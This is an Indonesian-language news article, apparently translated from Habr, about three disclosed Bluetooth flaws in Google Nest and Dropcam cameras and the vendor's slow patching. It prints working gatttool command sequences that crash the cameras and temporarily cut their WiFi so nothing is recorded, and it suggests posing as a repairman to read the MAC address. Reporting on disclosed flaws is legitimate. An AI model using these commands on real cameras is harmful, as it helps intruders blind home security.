Google Nest menampilkan kamera pengintai yang mudah dimatikan melalui Bluetooth


Kecerdasan buatan untuk mendeteksi orang-orang Google AI Nest Outdoor Cam tidak menyelamatkan dari peretasan yang mudah

Perlindungan teknologi paling tinggi tidak selalu yang terbaik. Dengan menambahkan kompleksitas ke sistem, Anda menambahkan vektor serangan baru. Kebetulan pembajak lebih mudah mencuri mobil paling mahal dan modern dengan kunci radio daripada "benda besi" lama. Hampir sama dengan keamanan di area lain.

Korban lain dari cracker adalah kamera pengintai Google Nest yang mewah - model Dropcam, Dropcam Pro, Nest Cam Outdoor dan Nest Cam. Kode untuk meretasnya sudah dipublikasikan di GitHub , dan Google belum merilis tambalan. Anda dapat berlatih mematikan kamera pengintai Anda hari ini (milik Anda, tentu saja).

Informasi tentang tiga kerentanan telah dipublikasikan, semuanya menyediakan untuk menghubungkan ke kamera melalui Bluetooth 4.0 LE (menurut spesifikasi, kisarannya sekitar 100 m). Bluetooth selalu berfungsi di kamera ini, artinya, secara umum tidak mungkin untuk mematikannya bahkan untuk pemiliknya.

Kerentanan pertama adalah buffer overflow dengan opsi SSID over Bluetooth. Untuk menyebabkan buffer overflow, Anda perlu mencoba mengatur parameter SSID baru dengan karakteristik yang salah pada kamera.

Berikut adalah contoh menghubungkan ke kamera dan mengatur panjang SSID 1 dan 16 byte sekaligus.

anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a031201AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.


Akibatnya, kamera akan mati, reboot setelah kesalahan, dan kembali ke kondisi pengoperasian normal.

Kerentanan kedua mirip dengan yang pertama, hanya di sini buffer overflow disebabkan oleh pengiriman kata sandi yang panjangnya salah (dalam hal ini, tiga byte dan satu byte). Hasilnya sama - kamera reboot setelah kesalahan dengan kembali ke kondisi kerja.

anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b506574536d6172742d356e1a01AAAAAA
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.


Kerentanan ketiga lebih menarik. Hal ini memungkinkan Anda untuk memutuskan sementara kamera dari jaringan WiFi, memberikannya SSID baru untuk koneksi. Dalam kamera ini, video lokal tidak tersedia, jadi kamera mentransfer semuanya melalui WiFi - seluruh arsip disimpan di layanan cloud. Karenanya, selama pemutusan dari jaringan, perekaman video tidak akan disimpan. Dibutuhkan sekitar 60-90 detik bagi kamera untuk kembali ke layanan setelah retasan dan melanjutkan perekaman video. Pada prinsipnya, ini bukan interval yang panjang, tetapi retasan dapat diulang untuk periode waktu yang diperlukan.

anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b0a6574536d6172742d356e1a20232320
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3becb824ba437c13233ac2ff78b1776456e47a01
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3ca5787d2f5e53f394a512200228003210bc9253
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3d48cada7a0d921d57b2d26ae89c3a04DEADBEEF
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3e
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>


Perhatikan bahwa dalam semua contoh untuk terhubung ke kamera, Anda perlu mengetahui alamat MAC-nya (18: B4: 30: 5D: 00: B8). Ini hanya ditulis pada bodi kamera, jadi dalam praktik untuk meretas, pertama-tama Anda harus mendekati kamera pada jarak yang cukup dekat. Misalnya, dengan kedok pemotong rumput, tukang reparasi atau teman dari calon korban.


Salah satu foto Nest Outdoor Cam menunjukkan bahwa alamat MAC ditulis pada badan kamera (baris di atas kode QR). Para pengembang dengan hati-hati menyembunyikannya di balik kabel listrik

Tiga kerentanan dalam kamera hadir dalam firmware kamera terbaru (5.2.1). Spesialis keamanan Jason Doyle menemukan mereka musim gugur lalu. Dia mengatakan bahwa dia melaporkan ke Google pada 26 Oktober 2016, jadi sekarang sepertinya saatnya untuk pengungkapan telah datang untuk semua orang. Ini adalah praktik standar jika pabrikan tidak terburu-buru atau tidak punya waktu untuk memperbaiki bug dalam waktu yang wajar. Dalam hal ini, hampir lima bulan telah berlalu.

Google biasanya membayar imbalan peneliti untuk menemukan kerentanan dalam produk mereka. Google Vulnerability Reward juga meluas ke camcorder Nest. Benar, Nest berada di kategori paling bergengsi ketiga, di mana hadiah maksimum hanya $ 5.000 (untuk sisa produk - $ 31.337). Selain itu, dalam kategori ketiga ini ada catatan khusus tentang masa hening selama enam bulan. Meskipun Google sendiri baru-baru ini mengungkapkan 0day yang dieksploitasi secara aktif di Windows dan Edge setelah 90 hari ( 1 , 2 ).

Jason Doyle tidak tahan dengan periode enam bulan (26 Oktober - 17 Maret), jadi dia tidak akan bisa mengklaim penghargaan itu. Tidak seperti praktik biasa, Google tidak memberi tahu peneliti tentang perkiraan tenggat waktu untuk menutup kerentanan dan tidak mendukung korespondensi dengannya. Pada saat yang sama, seorang sumber yang akrab dengan situasi mengatakan kepada The Register bahwa tambalan itu hampir siap, sehingga Jason tidak bisa mentolerir banyak hadiahnya.

Ngomong-ngomong, beberapa kamera pengintai serupa lainnya mematikan Bluetooth ketika koneksi WiFi dibuat, sehingga mereka tidak akan bisa memecahkan masalah dengan cara ini (misalnya, Logitech Circle). Google juga bisa menggunakan trik sederhana ini untuk menghilangkan kerentanan jenis ini.

Source: https://habr.com/ru/post/id402499/


All Articles